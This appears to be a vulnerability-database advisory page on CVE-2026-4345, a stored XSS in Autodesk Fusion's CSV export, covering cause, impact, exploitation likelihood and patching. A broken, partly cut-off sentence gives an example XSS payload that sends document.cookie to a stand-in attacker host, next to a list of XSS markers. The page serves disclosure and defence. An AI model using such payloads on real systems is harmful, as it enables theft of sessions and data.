
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-4345 is a Stored Cross-Site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application (CWE-79). A maliciously crafted HTML payload embedded in a design name can be triggered when the design is exported to CSV, potentially allowing an attacker to read local files or execute arbitrary code within the application process. The vulnerability affects Autodesk Fusion versions 2606.0 through 2702.1.46, with the fix introduced in version 2702.1.47. It was published on April 14, 2026, and carries a CVSS v3.1 base score of 7.1 (High) (GitHub Advisory, Autodesk Advisory).
The root cause is improper neutralization of user-controlled input (CWE-79) stored in design names within Autodesk Fusion. When a user exports a design to CSV, the application renders the design name in a context that interprets embedded HTML/JavaScript, triggering the stored XSS payload. The attack vector is local (AV:L), requires no privileges (PR:N), but does require user interaction — specifically, a victim must open or export the maliciously named design to CSV. No public proof-of-concept exploit code has been identified at this time (GitHub Advisory, Autodesk Advisory).
Successful exploitation allows a malicious actor to read local files from the victim's machine or execute arbitrary code in the context of the Autodesk Fusion process, resulting in high confidentiality and integrity impact with no availability impact. An attacker could exfiltrate sensitive design files, credentials, or other local data accessible to the Fusion process. The attack scenario requires a victim to open or export a design with a maliciously crafted name, making it a social-engineering-dependent but realistic threat in collaborative design environments (GitHub Advisory, Autodesk Advisory).
There is no evidence of active in-the-wild exploitation or a publicly available proof-of-concept at this time. The EPSS score is approximately 0.022–0.024%, placing it in the 7th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an attacker to share a maliciously named design with a target user who then exports it to CSV, limiting opportunistic exploitation (GitHub Advisory).
<script>fetch('http://attacker.com/?data='+document.cookie)</script> or a payload that reads local files via the application's file access APIs).<script>, onerror=, javascript:).Autodesk has released a patch in Fusion version 2702.1.47, which resolves this vulnerability. Users should update Autodesk Fusion to version 2702.1.47 or later immediately using the official Autodesk Fusion Client Downloader. As a temporary workaround prior to patching, users should avoid exporting designs to CSV if the design name contains suspicious HTML-like characters, and exercise caution when opening designs received from untrusted or unknown sources. Organizations should also implement access controls to restrict who can create and share designs internally (Autodesk Advisory, GitHub Advisory).
Coverage of CVE-2026-4345 has been limited to automated vulnerability tracking platforms and security alert aggregators such as RedPacket Security, VulDB, and CVE feed services. No notable independent researcher commentary or significant community discussion has been identified beyond standard CVE publication notices. The vulnerability was noted on Bluesky via automated CVE notification accounts shortly after disclosure.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."